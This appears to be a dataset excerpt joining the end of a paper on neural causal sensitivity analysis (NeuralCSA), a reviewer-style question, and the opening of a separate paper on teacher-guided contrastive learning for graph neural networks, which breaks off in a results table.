by maximizing or minimizing the empirical Stage 2 loss \[ L_2(\eta) = \sum_{i=1}^n F \left( P \left( f_{g_{\theta_{\text{opt}}}^*(x,a,i)}^* \left( (1 - \xi_{x,a,i}) \tilde{f}_{g_\eta(x,a,i)}(\tilde{U}) + \xi_{x,a,i} \tilde{U} \right) \right) \right), \] where \( \xi_{x,a,i} = P_{\text{obs}}(a_i \mid x_i) \), if \( A \) is discrete, and \( \xi_{x,a,i} = 0 \), if \( A \) is continuous. **Learning algorithm for stage 2:** There are two remaining challenges we need to address in Stage 2: (i) optimizing Eq. (6) does not ensure that the sensitivity constraints imposed by the GTSM \( M \) hold; and (ii) computing the Stage 2 loss from Eq. (6) may not be analytically tractable. For (i), we propose to incorporate the sensitivity constraints by using the augmented Lagrangian method (Nocedal & Wright, 2006), which has already been successfully applied in the context of partial identification with neural networks (Padh et al., 2023; Schröder et al., 2024). For (ii), we propose to obtain samples \( \tilde{u} = (\tilde{u}_{x,a,j}^{(j)})_{j=1}^k \overset{\text{i.i.d.}}{\sim} N(0_{d_u}, I_{d_u}) \) and \( \xi = (\xi_{x,a,j}^{(j)})_{j=1}^k \overset{\text{i.i.d.}}{\sim} \text{Bernoulli}(P_{\text{obs}}(a \mid x)) \). together with Monte Carlo estimators $\hat{L}_2(\eta, \tilde{u}, \xi)$ of the Stage 2 loss $L_2(\eta)$ and $\hat{D}_{x,a}(\eta, \tilde{u})$ of the sensitivity constraint $D_{x,a}(P(U | x), P(U | x, a))$. We refer to Appendix E for details, including instantiations of our framework for numerous sensitivity models and causal queries. **Implementation:** We use autoregressive neural spline flows (Durkan et al., 2019; Dolatabadi et al., 2020). For estimating propensity scores $P_{\text{obs}}(a | x)$, we use fully connected neural networks with softmax activation. We perform training using the Adam optimizer (Kingma & Ba, 2015). We choose the number of epochs such that NEURALCSA satisfies the sensitivity constraint for a given sensitivity parameter. Details are in Appendix F. ## 6 EXPERIMENTS We now demonstrate the effectiveness of NEURALCSA for causal sensitivity analysis empirically. As is common in the causal inference literature, we use synthetic and semi-synthetic data with known causal ground truth to evaluate NEURALCSA (Kallus et al., 2019; Jesson et al., 2022). We proceed as follows: (i) We use synthetic data to show the validity of bounds from NEURALCSA under multiple sensitivity models, treatment types, and causal queries. We also show that for the MSM, the NEURALCSA bounds coincide with known optimal solutions. (ii) We show the validity of the NEURALCSA bounds using a semi-synthetic dataset. (iii) We show the applicability of NEURALCSA in a case study using a real-world dataset with multiple outcomes, which cannot be handled by previous approaches. We refer to Appendix D for details regarding datasets and experimental evaluation, and to Appendix H for additional experiments. ![Figure 5](image-url) **Figure 5:** Validating the correctness of NEURALCSA (ours) by comparing with optimal closed-form solutions (CF) for the MSM on simulated data. *Left:* Dataset 1, binary treatment. *Right:* Dataset 2, continuous treatment. Reported: mean ± standard deviation over 5 runs. ![Figure 6](image-url) **Figure 6:** Confirming the validity of our NEURALCSA bounds for various sensitivity models. *Left:* Dataset 1, binary treatment. *Right:* Dataset 2, continuous treatment. Reported: mean ± standard deviation over 5 runs. (i) **Synthetic data:** We consider two synthetic datasets of sample size $n = 10000$ inspired from previous work on sensitivity analysis: Dataset 1 is adapted from Kallus et al. (2019) and has a binary treatment $A \in \{0, 1\}$. The data-generating process follows an MSM with oracle sensitivity parameter $\Gamma^* = 2$. We are interested in the CATE $\tau(x) = \mathbb{E}[Y(1) - Y(0) | x]$. Dataset 2 is adapted from Jesson et al. (2022) and has a continuous treatment $A \in [0, 1]$. Here, we are interested in the dose-response function $\mu(x, a) = \mathbb{E}[Y(a) | x]$, where we choose $a = 0.5$. We report results for further treatment values in Appendix H. We first compare our NEURALCSA bounds with existing results closed-form bounds (CF) for the MSM (Dorn & Guo, 2022; Frauen et al., 2023b), which have been proven to be optimal. We plot both NEURALCSA and the CF for both datasets and three choices of sensitivity parameter $\Gamma \in \{2, 4, 10\}$ (Fig. 5). Our bounds almost coincide with the optimal CF solutions, which confirms that NEURALCSA learns optimal bounds under the MSM. We also show the validity of our NEURALCSA bounds for Rosenbaum’s sensitivity model and the following $f$-sensitivity models: Kullback-Leibler (KL, $f(x) = x \log(x)$), Total Variation (TV, $f(x) = 0.5|x - 1|$), Hellinger (HE, $f(x) = (\sqrt{x} - 1)^2$), and Chi-squared ($\chi^2$, $f(x) = (x - 1)^2$). To do so, we choose the ground-truth sensitivity parameter $\Gamma^*$ for each sensitivity model that satisfies the respective sensitivity constraint (see Appendix G for details). The results are in Fig. 6. We make the following observations: (i) all bounds cover the causal query on both datasets, thus confirming the validity of NEURALCSA. (ii) For Dataset 1, the MSM returns the tightest bounds because our simulation follows an MSM. (ii) Semi-synthetic data: We create a semi-synthetic dataset using MIMIC-III (Johnson et al., 2016), which includes electronic health records from patients admitted to intensive care units. We extract 8 confounders and a binary treatment (mechanical ventilation). Then, we augment the data with a synthetic unobserved confounder and outcome. We obtain \( n = 14719 \) patients and split the data into train (80%), val (10%), and test (10%). For details, see Appendix G. We verify the validity of our NEURALCSA bounds for CATE in the following way: For each sensitivity model, we obtain the smallest oracle sensitivity parameter \( \Gamma^* \) that guarantees coverage (i.e., satisfies the respective sensitivity constraint) for 50% of the test samples. Then, we plot the coverage and median interval length of the NEURALCSA bounds over the test set. The results are in Table 2. We observe that (i) all bounds achieve at least 50% coverage, thus confirming the validity of the bounds, and (ii) some sensitivity models (e.g., the MSM) are conservative, i.e., achieve much higher coverage and interval length than needed. This is because the sensitivity constraints of these models do not adapt well to the data-generating process, thus the need for choosing a large \( \Gamma^* \) to guarantee coverage. This highlights the importance of choosing a sensitivity model that captures the data-generating process well. For further details, we refer to (Jin et al., 2022). We also provide further insights into the difference between two exemplary sensitivity models: the MSM and the KL-sensitivity model. To do so, we plot the observational distribution from stage 1 together with the shifted distributions from stage 2 that lead to the respective upper bound for a fixed test patient (Fig. 7). The distribution shift corresponding to the MSM is a step function, which is consistent with results from established literature (Jin et al., 2023). This is in contrast to the smooth distribution shift obtained by the KL-sensitivity model. In addition, this example illustrates the possibility of using NEURALCSA for sensitivity analysis on the entire interventional density. (iii) Case study using real-world data: We now demonstrate an application of NEURALCSA to perform causal sensitivity analysis for an interventional distribution on multiple outcomes. To do so, we use the same MIMIC-III data from our semi-synthetic experiments but add two outcomes: heart rate (\( Y_1 \)) and blood pressure (\( Y_2 \)). We consider the causal query \( P(Y_1(1) \geq 115, Y_2(1) \geq 90 | X = x) \), i.e., the joint probability of achieving a heart rate higher than 115 and a blood pressure higher than 90 under treatment intervention (“danger area”). We consider an MSM and train NEURALCSA with sensitivity parameters \( \Gamma \in \{2, 4\} \). Then, we plot the stage 1 distribution together with both stage 2 distributions for a fixed, untreated patient from the test set in Fig. 8. As expected, increasing \( \Gamma \) leads to a distribution shift in the direction of the “danger area”, i.e., high heart rate and high blood pressure. For \( \Gamma = 2 \), there is only a moderate fraction of probability mass inside the danger area, while, for \( \Gamma = 4 \), this fraction is much larger. A practitioner may potentially decide against treatment if there are other unknown factors (e.g., undetected comorbidity) that could result in a confounding strength of \( \Gamma = 4 \). Conclusion. From a methodological perspective, NEURALCSA offers new ideas to causal sensitivity analysis and partial identification: In contrast to previous methods, NEURALCSA explicitly learns a latent distribution shift due to treatment intervention. We refer to Appendix I for a discussion on limitations and future work. From an applied perspective, NEURALCSA enables practitioners to perform causal sensitivity analysis in numerous settings, including multiple outcomes. Furthermore, it allows for choosing from a wide variety of sensitivity models, which may be crucial to effectively incorporate domain knowledge about the data-generating process. | Sensitivity model | Coverage | Interval length | |------------------|----------|----------------| | MSM \( \Gamma^* = 5.48 \) | 0.91 ± 0.03 | 0.77 ± 0.03 | | KL \( \Gamma^* = 0.25 \) | 0.54 ± 0.07 | 0.31 ± 0.01 | | TV \( \Gamma^* = 0.38 \) | 0.86 ± 0.09 | 0.83 ± 0.14 | | HE \( \Gamma^* = 0.18 \) | 0.83 ± 0.06 | 0.63 ± 0.03 | | \( \chi^2 \Gamma^* = 0.68 \) | 0.67 ± 0.07 | 0.41 ± 0.01 | | RB \( \Gamma^* = 14.42 \) | 0.79 ± 0.07 | 0.56 ± 0.03 | Table 2: Results for semi-synthetic data Reported: mean ± standard deviation (5 runs). Acknowledgements. S.F. acknowledges funding via Swiss National Science Foundation Grant 186932. REFERENCES Matteo Bonvini, Edward Kennedy, Valerie Ventura, and Larry Wasserman. Sensitivity analysis for marginal structural models. *arXiv preprint*, arXiv:2210.04681, 2022. Scott Shaobing Chen and Ramesh A. Gopinath. Gaussianization. In *NeurIPS*, 2000. Victor Chernozhukov, Ivan Fernández-Val, and Blaise Melly. Inference on counterfactual distributions. *Econometrica*, 81(6):2205–2268, 2013. Victor Chernozhukov, Denis Chetverikov, Mert Demirer, Esther Duflo, Christian Hansen, Whitney Newey, and James M. Robins. Double/debiased machine learning for treatment and structural parameters. *The Econometrics Journal*, 21(1):C1–C68, 2018. ISSN 1368-4221. James Cornfield, William Haenszel, E. Cuyler Hammond, Abraham M. Lilienfeld, Michael B. Shimkin, and Ernst L. Wynder. Smoking and lung cancer: Recent evidence and a discussion of some questions. *Journal of the National Cancer Institute*, 22(1):173–203, 1959. Alicia Curth and Mihaela van der Schaar. Nonparametric estimation of heterogeneous treatment effects: From theory to learning algorithms. In *AISTATS*, 2021. Haid M. Dolatabadi, Sarah Erfani, and Christopher Leckie. Invertible generative modeling using linear rational splines. In *AISTATS*, 2020. Jacob Dorn and Kevin Guo. Sharp sensitivity analysis for inverse propensity weighting via quantile balancing. *Journal of the American Statistical Association*, 2022. Jacob Dorn, Kevin Guo, and Nathan Kallus. Doubly-valid/ doubly-sharp sensitivity analysis for causal inference with unmeasured confounding. *arXiv preprint*, arXiv:2112.11449, 2022. Guilherme Duarte, Noam Finkelstein, Dean Knox, Jonathan Mummolo, and Ilya Shpitser. An automated approach to causal inference in discrete settings. *Journal of the American Statistical Association*, 2023. Conor Durkan, Artur Bekasov, Iain Murray, and George Papamakarios. Neural spline flows. In *NeurIPS*, 2019. A. Mesut Erzurumluoglu and et al. Meta-analysis of up to 622,409 individuals identifies 40 novel smoking behaviour associated genetic loci. *Molecular psychiatry*, 25(10):2392–2409, 2020. Stefan Feuerriegel, Dennis Frauen, Valentyn Melnychuk, Jonas Schweisthal, Konstantin Hess, Alicia Curth, Stefan Bauer, Niki Kilbertus, Isaac S. Kohane, and Mihaela van der Schaar. Causal machine learning for predicting treatment outcomes. *Nature Medicine*, 2024. Dennis Frauen, Tobias Hatt, Valentyn Melnychuk, and Stefan Feuerriegel. Estimating average causal effects from patient trajectories. In *AAAI*, 2023a. Dennis Frauen, Valentyn Melnychuk, and Stefan Feuerriegel. Sharp bounds for generalized causal sensitivity analysis. In *NeurIPS*, 2023b. Florian Gunsilius. A path-sampling method to partially identify causal effects in instrumental variable models. *arXiv preprint*, arXiv:1910.09502, 2020. Tobias Hatt, Daniel Tschernutter, and Stefan Feuerriegel. Generalizing off-policy learning under sample selection bias. In *UAI*, 2022. Siyu Heng and Dylan S. Small. Sharpening the rosenbaum sensitivity bounds to address concerns about interactions between observed and unobserved covariates. *Statistica Sinica*, 31(Online special issue):2331–2353, 2021.
6LyO8WTVTU
Intuitively, if you have a perfect teacher model, you can use it directly to calculate graph embeddings. Is it necessary to design such complicated contrastive learning losses to distill from the teacher model?
A Teacher-Guided Framework for Graph Representation Learning Anonymous authors Paper under double-blind review Abstract We consider the problem of unsupervised representation learning for Graph Neural Networks (GNNs). Several state-of-the-art approaches to this problem are based on Contrastive Learning (CL) principles that generate transferable representations. Their objective function can be posed as a supervised discriminative task using ‘hard labels,’ as they consider each pair of graphs as either ‘equally positive’ or ‘equally negative’. However, it has been observed that using ‘soft labels’ in a Bayesian way can reduce the variance of the risk for discriminative tasks in supervised settings. Motivated by this, we propose a CL framework for GNNs, called Teacher-guided Graph Contrastive Learning (TGCL), that incorporates ‘soft labels’ to facilitate a more regularized discrimination. In particular, we propose a teacher-student framework where the student network learns the representation by distilling the representations produced by the teacher network trained using unlabelled graphs. Our proposed approach can be adapted to any existing CL methods and empirically improves the performance across diverse downstream tasks. 1 Introduction Graphs are versatile data structures representing relationships between entities in various real-world applications, e.g., social networks (Ohtsuki et al., 2006; Fan et al., 2019), bio-informatics (Muzio et al., 2021), and knowledge graphs (Wang et al., 2014; Baek et al., 2020). Acquiring labeled information for these applications can be a costly and time-consuming process. Towards this, self-supervised Learning (SSL) has emerged as an important research area that leverages the inherent structure or content of the data to learn informative representations without relying on explicit labels (Hu* et al., 2020; Hwang et al., 2020; Grover & Leskovec, 2016). Existing SSL methods for graphs can be broadly categorized as: (a) local similarity-based predictive learning and (b) global similarity-based contrastive learning. Predictive learning-based methods (Hu* et al., 2020; Kim & Oh, 2021; Rong et al., 2020) produces artificial labels by capturing specific local contextual information of neighborhood sub-graphical features to produce the representations. However, it restricts them only to capture the local graph semantics. Alternatively, contrastive learning (CL)-based models for graphs aim to maximize the agreements between instances perturbed by semantic-invariant augmentations (positive views) while repelling the others (negative views) to capture global semantics. CL-based SSL models are extremely popular in the computer-vision community as one can easily generate such semantic-invariant perturbations using simple techniques e.g., rotation, flipping, and color jittering (Chen et al., 2020a; Grill et al., 2020). Several graph contrastive learning methods are also proposed where the positive pairs are produced using transformations e.g., edge perturbation, attribute masking, and subgraph sampling. However, unlike continuous domains (e.g., images), even “minor” modifications in the graph structures, such as removing one edge or node, can significantly change the properties of graphs due to their discrete nature (see Figure 1a and 1b). Recently, discrepancy-based Self-supervised Learning (D-SLA) (Kim et al., 2022) introduces edit distance-based discrepancy measures to address these issues. However, computing the edit distance between two arbitrary graphs is NP-hard (Sanfeliu & Fu, 1983; Zeng et al., 2009). Further, it can only provide high-level structural information without capturing any semantic differences (Figure 1a and Figure 1b). Towards this, we aim to develop a graph representation learning framework that incorporates more semantically-rich discriminative features to regularize the learning. Figure 1: Illustrating the shortcomings of existing CL methods: (a) Even a “minor change” of removal of one edge significantly changes the graph to two disconnected components that cannot be captured even using edit-distance-based discrepancy (Kim et al., 2022). (b & c) Next, we see a more specific example of correlated-structured molecules that either actively bind to a set of human β-secretase inhibitors or inactive (Wu et al., 2018). (b) Molecules having dissimilar properties can have smaller edit distances while (c) molecules from the same class can have larger edit distances. In other words, edit distance remains ineffective in capturing chemical semantics. To this end, we propose a distilled distance form a pre-trained teacher network to incorporate a “soft” perception of semantic distances for arbitrary graphs to produce better representations for a student network. 1.1 Motivation & Contributions The existing CL methods can be viewed under one umbrella since all of these techniques aim to learn representations by contrasting different views of the input graphs. In principle, these loss functions can be considered classification objectives by creating pseudo-labels among different views of input graphs (Oord et al., 2018; Gutmann & Hyvärinen, 2010). On the other hand, in the supervised learning literature, it has been observed that incorporating ‘soft labels’ in the form of Knowledge Distillation (KD) leads to better generalization (Menon et al., 2021; Hinton et al., 2015). Given these prior results, we ask the following question in this work: Whether introducing ‘soft labels’ for CL methods can produce better graph representations? The fundamental idea of KD is to use softened labels via a teacher network while minimizing the supervised risk of a student network by reducing the divergence between their logits (Hinton et al., 2015). Prior works have shown that Bayes-distilled risk has lower variance compared to naive undistilled counterpart, which leads to better generalization (Menon et al., 2021). Motivated by these results, we propose a novel Teacher-guided Graph Contrastive Learning (TGCL) framework. We design a distilled perception distance (or distilled distance) between two arbitrary input graphs using their deep features obtained from a pre-trained “teacher” to define a softer notion of positive/negative pairs. We train the student network by incorporating such ‘soft labels’ for each pair of graphs. We argue that by introducing distilled distance, we can introduce the regularized semantic difference between two arbitrary graphs, addressing the shortcomings of the existing CL frameworks for graphs. For example, Figure 1c demonstrates that our distilled distance obtained from the “teacher” can significantly differ among molecular graphs with correlated structures, towards capturing the chemical semantic differences for graphs. Figure 1b shows that the distilled distance captures the chemical semantic difference of molecules with different chemical properties, however, with a minor structural difference. The contributions of this work are summarized below: 1. We propose a novel Teacher-guided Graph Contrastive Learning (TGCL) framework for incorporating the concept of knowledge distillation to learn graph representations. 2. The concept of “soft-labeled” pairs of graphs can be applied to any contrastive learning framework. We propose a distilled perception distance and present two TGCL frameworks by modifying the well-known NT-Xent loss and D-SLA method to incorporate smooth perception from a teacher network for training the student network. 3. We conduct extensive experiments on graph classification for molecular datasets and link prediction on social network datasets where our proposed framework consistently outperforms the existing methods. 2 RELATED WORK 2.1 REPRESENTATION LEARNING ON GRAPHS Classical Approaches: A straightforward graph representation approach considers a ‘bag of nodes’, which falls short in capturing their overall semantics (Hamilton 2020). Weisfeiler-Lehman kernel (Shervashidze et al., 2011) improves upon this by utilizing the iterative neighborhood aggregation strategy. One may also count the occurrence of small subgraph structures, called graphlets. However, it is a combinatorially challenging problem, and approximate algorithms are required (Ahmed et al., 2015; Hočevar & Demšar, 2014). A few other approaches enumerate different kinds of paths in graphs (Kashima et al., 2003; Borgwardt & Kriegel, 2005). Shallow Algorithms: DeepWalk (Perozzi et al., 2014) and LINE (Tang et al., 2015) are random walk-based approaches using depth-first search (DFS) and breadth-first search (BFS) algorithms, respectively. “node2vec” (Grover & Leskovec, 2016) combines both BFS and DFS to learn node embeddings that maximize the likelihood of preserving node neighborhoods. Predictive Self-supervised Graph Representation Learning: Here, the model aims to predict specific properties or relationships of graphs, such as predicting the attributes of masked nodes/edges (Hu et al., 2020), predicting the presence of an edge (Hwang et al., 2020), or predicting contextual properties and presence of motifs (Hu et al., 2020; Rong et al., 2020). These predictive tasks serve as self-supervised learning objectives, as they do not require explicit supervised labels. Instead, they rely on the local sub-structure of the graph for producing labels. Contrastive Self-supervised Graph Representation Learning: Deep Graph Infomax (DGI) (Veličković et al., 2019) maximizes the mutual information between graph representation and patch representation. InfoGraph (Sun et al., 2020) maximizes the mutual information between the graph-level representation and the representations of substructures of different scales, such as nodes, edges, and triangles. Several other works (You et al., 2020, 2021; Zhu et al., 2021; Yin et al., 2022; Wang et al., 2022) generate a perturbed view of the original graph through attribute masking, edge perturbation, and subgraph sampling and employ contrastive learning framework for better representation learning. Recent works (Suresh et al., 2021; Yang et al., 2021) also explore adversarial augmentation strategies to improve the contrastive frameworks’ representations further. 2.2 KNOWLEDGE DISTILLATION (KD) KD (Hinton et al., 2015) is a popular technique to transfer knowledge from a large, complex model (a.k.a. the teacher) to a smaller, efficient model (a.k.a. the student) while performing similarly to the teacher. Several ongoing works also focus on improving the student’s performance on a wide range of applications (Heo et al., 2019; Furlanello et al., 2018; Lopes et al., 2017; Li et al., 2021; Lee et al., 2018; Bhat et al., 2021). KD allows the student to learn from both the raw data and distilled knowledge of the teacher, improving their generalized performance (Menon et al., 2021). A comprehensive review of KD can be found in (Wang & Yoon, 2021). Self-supervised learning with KD is previously explored for computer vision, typically to improve the performance of smaller models (Abbasi Koohpayegani et al., 2020; Chen et al., 2020b). Many of these approaches combined KD with CL methods (Fang et al., 2021; Gao et al., 2022). SimCLR-v2 (Chen et al., 2020b) applied a larger teacher model, first trained using contrastive loss followed by supervised fine-tuning to distill a smaller model via self-supervised learning. Xu et al. (2020) incorporates auxiliary contrastive loss to obtain richer knowledge from the teacher network. Other approaches are proposed to transfer the final embeddings of a self-supervised pre-trained teacher (Navaneet et al., 2022; Song et al., 2023). Limitations & Challenges: (1) Most of these methods applied supervised labels to finetune the teacher network, restricting their applicability. (2) Further, these methods may not be applicable to graph inputs due to their discrete structure where even minor perturbations can significantly change their semantics. Towards this, our proposed TGCL first aims to obtain the teacher’s distilled perception to calculate the semantic difference for any pairs, followed by formulating soft self-supervised losses to train the student. Figure 2: Comparing our proposed teacher-guided contrastive learning (TGCL) framework with the existing contrastive learning [You et al., 2020; Xu et al., 2021], and D-SLA [Kim et al., 2022]. From the classification point of view, the standard CL methods consider the similarity between the anchor and the perturbed graphs as “hard” positive pairs while the other graphs as “hard” negative pairs. D-SLA introduces “hard” discrepancies using edit distance between the anchor and the perturbed graphs, while the other graphs as “hard” negative pairs. Our proposed TGCL introduces a novel distilled perception distance for smooth discrimination between any arbitrary graphs. 3 Proposed Method 3.1 Preliminaries Graph Neural Network (GNN). Let \( G = (V, E, X_V, X_E) \) be an undirected graph in the space of graphs \( \mathcal{G} \), where \( V, E, X_V, X_E \) denote the set of nodes, edges, node attributes, and edge attributes respectively. GNN encodes a graph \( G \in \mathcal{G} \) to a \( d \)-dimensional embedding vector: \( f : \mathcal{G} \rightarrow \mathbb{R}^d \). \( f \) is often composed by stacking multiple message-passing layers. Let \( h_v^{(l)} \) denote the representation of a node \( v \in V \) having a neighborhood \( N_v \) in the \( l \)th layer. \( h_{vu}^{(l-1)} \) represents the attributes of edge \((v, u) \in E\) in the \((l-1)\)th layer. Then, \( h_v^{(l)} \) can be expressed as follows: \[ h_v^{(l)} = \phi_U^{(l-1)} \left( h_v^{(l-1)}, \bigoplus_{u \in N_v} \psi_M^{(l-1)}(h_v^{(l-1)}, h_u^{(l-1)}, h_{vu}^{(l-1)}) \right), \] where \( \phi_U^{(l-1)}, \psi_M^{(l-1)} \) are the update and the message function of \((l-1)\)th layer respectively. \( \bigoplus \) is a permutation invariant aggregation operator. Global Representations for Graphs using Contrastive Learning. Contrastive learning (CL) aims to learn meaningful representations by attracting the positive pairs (i.e., similar instances, such as two different perturbations of the same graph) while repelling negative pairs (i.e., dissimilar instances, such as two different input graphs) in an unsupervised manner, as shown in Figure 2(b). Formally, let \( G_0 \) denote the original graph, \( G_p \) denote its perturbed version (i.e., a positive pair), and \( G_n \) is a different input graph (i.e., negative sample). Then, the CL objective can be defined as follows: \[ L_{CL} = - \log \frac{\text{sim}(f(G_0), f(G_p))}{\sum_{G_n} \text{sim}(f(G_0), f(G_n))}, \] where \( f \) is a GNN and \( \text{sim}(\cdot, \cdot) \) is a similarity measure for embeddings. Minimization of Equation 2 brings positive pairs closer and pushes negative pairs further apart in the embedding space. However, unlike image augmentation schemes (e.g., scaling, rotation, color jitter), graph augmentation schemes (e.g., node/edge perturbations, subgraph sampling) may fail to preserve the graph semantics. For example, Figure 2(b) illustrates that removing one edge leads to two disconnected graphs, significantly changing the original semantics. Recently, D-SLA incorporates edit distances between graphs to train their model, partially addressing this issue [Kim et al., 2022]. 3.2 Proposed Teacher-guided Contrastive Learning (TGCL) for Graphs The fundamental motivation of our proposed TGCL framework is based on the following results. More formal statements can be found in the Appendix B. - Noise contrastive Estimation, which is equivalent to solving a binary classification problem between the samples of data and noise [Gutmann & Hyvärinen, 2010] (Proposition B.1). • In supervised learning, ‘soft labels’ in the form of Knowledge Distillation (KD) leads to better generalization by reducing the variance of Bayes-distilled risk (Menon et al., 2021) [Proposition B.2 and B.3]. The first result indicates that the existing CL methods can be viewed as a supervised classification loss where the network is trained by producing artificially generated “hard pseudo-labels” (Gutmann & Hyvärinen, 2010; Oord et al., 2018). For example, \( L_{cl} \) (in Eq. 2) can be viewed as labeling the similarity between positive pairs, \( \text{sim}(f(G_0), f(G_p)) \) as a positive class, and negative pairs are considered as the negative class. Similarly, we can analyze the loss components for D-SLA (Kim et al., 2022): Their graph discrimination loss considers the original and perturbed graphs as two different classes. Their edit-distance based-loss uses the edit distance between the anchor and the perturbed graph as a “hard margin” to learn the representations. Finally, their margin loss acts similar to \( L_{cl} \) (Eq. 2), where the similarity between the anchor and the perturbed graph is labeled as 1, and the similarity between two arbitrary graphs is labeled as 0. The second result demonstrates that we can achieve better generalization performance by ‘softening’ the labels for an existing CL method as the Bayes-distilled risk has lower variance compared to the naive un-distilled counterpart (Menon et al., 2021). To this end, we introduce a softer notion of distance by proposing a distilled perception distance, \( D_{dp} \), for any two arbitrary graphs by comparing their deep features from a teacher network, pre-trained using ‘hard’ pseudo-labels. **Distilled Perceptual Distance.** Let \( G_a \) and \( G_b \) be two arbitrary graphs. Consider a representation learning model with \( L \) message passing layers as the teacher. At each layer, \( l \), we obtain the node-embedding \( \{h^{(l)}_v\}_{v \in V} \) for a graph \( G \) and apply a pooling operation (e.g., max-pool, avg-pool) to obtain a fixed-length vector, denoted as \( h^{(l)}_G \). We extract such fixed-length features from each layer and concatenate them, i.e., \( h_{G_a} = [\{h^{(l)}_G\}]_l \) and \( h_{G_b} = [\{h^{(l)}_G\}]_l \) for \( G_a \) and \( G_b \) respectively. The distilled perception distance (or distilled distance) \( D_{dp} \) is then defined as the \( L_2 \) distance between these concatenated features, as follows: \[ D_{dp}(G_a, G_b) = ||h_{G_a} - h_{G_b}||_2 \] Notably, our proposed distilled distance is similar to the well-known “perceptual distance” from computer vision literature. It compares the high-level rich latent activations extracted from a pre-trained convolutional neural network (CNN) (e.g., VGG (Simonyan & Zisserman, 2014) or ResNet (He et al., 2016)) to incorporate semantic differences between two samples (Johnson et al., 2016). ### 3.3 Proposed Loss Functions The concept of teacher-guided loss with “softer” positive/negative pairs to train the student network can be introduced to any contrastive learning framework for graphs. To showcase the flexibility of our proposed TGCL framework, we present two versions of our TGCL framework using normalized temperature-scaled cross-entropy (NT-Xent) (Chen et al., 2020a; You et al., 2020) loss and D-SLA (Kim et al., 2022): (I) **TGCL-NTXent** & (II) **TGCL-DSLA**. Figure 3: Block diagram of our proposed TGCL framework. We obtain the representations from a pre-trained teacher model and compute the distilled distance for each pair of inputs. These pairwise distances are employed to “soften” the loss functions to train the student. 3.3.1 TGCL-NTXent: TGCL framework using NT-Xent Loss We modify the NT-Xent loss for our TGCL framework as follows: \[ L_{TGCL-NTXent} = \sum_{G_p} - \log \frac{\exp(D_{dp}(G_0, G_p) \cdot f_s(G_0) \cdot f_s(G_p)/\tau)}{\sum_{G_n} \exp(D_{dp}(G_0, G_n) \cdot f_s(G_0) \cdot f_s(G_n)/\tau)} \] where, \(f_s\) is the student network and \(f_s(\cdot)\) is the representations obtained from \(f_s\). \(G_0\) is the anchor sample, \(G_p_i\) is the \(i^{th}\) perturbed sample. \(G_n_j\) is \(j^{th}\) negative sample for the anchor, \(G_0\). Here, we incorporate distilled distance, \(D_{dp}(G_0, G_p)\), in both numerator and denominator. The intuition is to produce larger similarly for positive pairs (i.e., \(f_s(G_0) \cdot f_s(G_p)\)) when the teacher’s perception of distilled distance is small. 3.3.2 TGCL-DSLA: TGCL framework using D-SLA Next, we demonstrate how to introduce distilled perception distance to incorporate the concept of teacher-guided “soft pairs” for D-SLA. (a) Teacher-guided Soft Discrimination: We first discriminate the perturbed graphs from the original anchor by introducing \(L_{T-soft}\): It consists of two terms: the first one is a KD-based loss, \(L_{KD}\), while the second component is a weighted graph discrimination loss (\(L_{wGD}\)). We first obtain the distilled distances: \([D_{dp}(G_0, G_0), \{D_{dp}(G_0, G_p_i)\}] \) between the anchor, \(G_0\), with itself and the \(i^{th}\) perturbed variations, \(G_p_i\). We obtain the similarities by taking reciprocals of the normalized distilled distance, followed by clipping to ensure numerical stability: \[ s_0 = \text{clip}(D_{dp}(G_0, G_0)^{-1}) \quad \text{and} \quad s_i = \text{clip}(D_{dp}(G_0, G_p_i)^{-1}) \quad \forall i \] Next, we compute a probability distribution (soft labels) using the softmax-activation with temperature, \(\tau\) i.e., softmax\((s_0, s_1, \cdots; T = \tau)\). Similarly, we obtain a score for each graph and compute a probability distribution using temperature-scaled softmax: softmax\((\Psi \circ f_s(G_p_i); T = \tau)\). Now, we obtain the distillation loss, \(L_{KD}\) by minimizing the entropy between these probability distributions: \[ L_{KD} := \tau^2 H\left(\text{softmax}(s_0, s_1, \cdots; \tau), \text{softmax}(\Psi \circ f_s(G_p_i); \tau)\right) \] where, \(H(y, \hat{y}) = \sum_y - y \log \hat{y}\) is the cross-entropy function. \(\Psi \circ f_s\) is the composition of the score function, \(\Psi\), and the student network, \(f_s\). Therefore, this loss incorporates the teacher’s smoothened perception in the score functions to learn the student’s representations. The second term, \(L_{wGD}\), is a set of binary cross-entropy functions with \(G_0\) is labeled as 1 and \(G_p_i\)’s are labeled as 0 with the associated soft-weights as \(w_i\): \[ L_{wGD} = \left[ H(1, \sigma(\Psi \circ f_s(G_0))) + \sum_i w_i H(0, \sigma(\Psi \circ f_s(G_p_i))) \right], \] where, \(w_i = \frac{D_{dp}(G_0, G_p_i)}{\sum_j D_{dp}(G_0, G_p_j)}\). Therefore, \(L_{wGD}\) incorporates the teacher’s soft label via \(w_i\). Now, \(L_{T-soft}\) combines both aforementioned loss components with a hyper-parameter \(\alpha\). \[ L_{T-soft} = \alpha L_{KD} + (1 - \alpha)L_{wGD} \] (b) Teacher-guided Perception Loss: Next, we introduce a perception loss, \(L_{T-percept}\). It ensures that the embedding-level difference between original and perturbed graphs is proportional to a teacher’s perspective of their corresponding distilled distances. \[ L_{T-percept} = \sum_{i,j} \left( \frac{\text{dist}(f_s(G_p_i), f_s(G_0))}{D_{dp}(G_p_i, G_0)} - \frac{\text{dist}(f_s(G_p_j), f_s(G_0))}{D_{dp}(G_p_j, G_0)} \right)^2 \] where, \(\text{dist}(f_s(G_a), f_s(G_b))\) denotes the \(L_2\) distance of graph \(G_a\) \(G_b\) in their representation space. (c) Teacher-guided Margin Loss for Negative Graphs: Our third component, \(L_{T-Margin}\) is a modified margin loss where the distilled distance acts as a regularizer, controlling the margin among Table 1: Performance (mean ± std) comparison on graph classification task. | Methods | BBBP | ClinFox | MUV | HIV | BACE | SIDER | Tox21 | ToxCast | Avg | |------------------|------|---------|-----|-----|------|-------|-------|---------|-----| | No Pretrain | 65.8 ± 4.5 | 58.0 ± 4.4 | 71.8 ± 2.5 | 75.3 ± 1.9 | 70.1 ± 5.4 | 57.3 ± 1.6 | 74.0 ± 0.8 | 63.4 ± 0.6 | 66.96 | | EdgePred (Hamilton et al., 2017) | 67.3 ± 2.4 | 64.1 ± 3.7 | 74.1 ± 2.1 | 76.3 ± 1.0 | 79.9 ± 0.9 | 60.4 ± 0.7 | 76.0 ± 0.6 | 64.1 ± 0.6 | 70.28 | | AttrMasking (Hu et al., 2020) | 64.3 ± 2.8 | 71.8 ± 4.1 | 74.7 ± 1.4 | 77.2 ± 1.1 | 79.3 ± 1.6 | 61.0 ± 0.7 | 76.7 ± 0.4 | 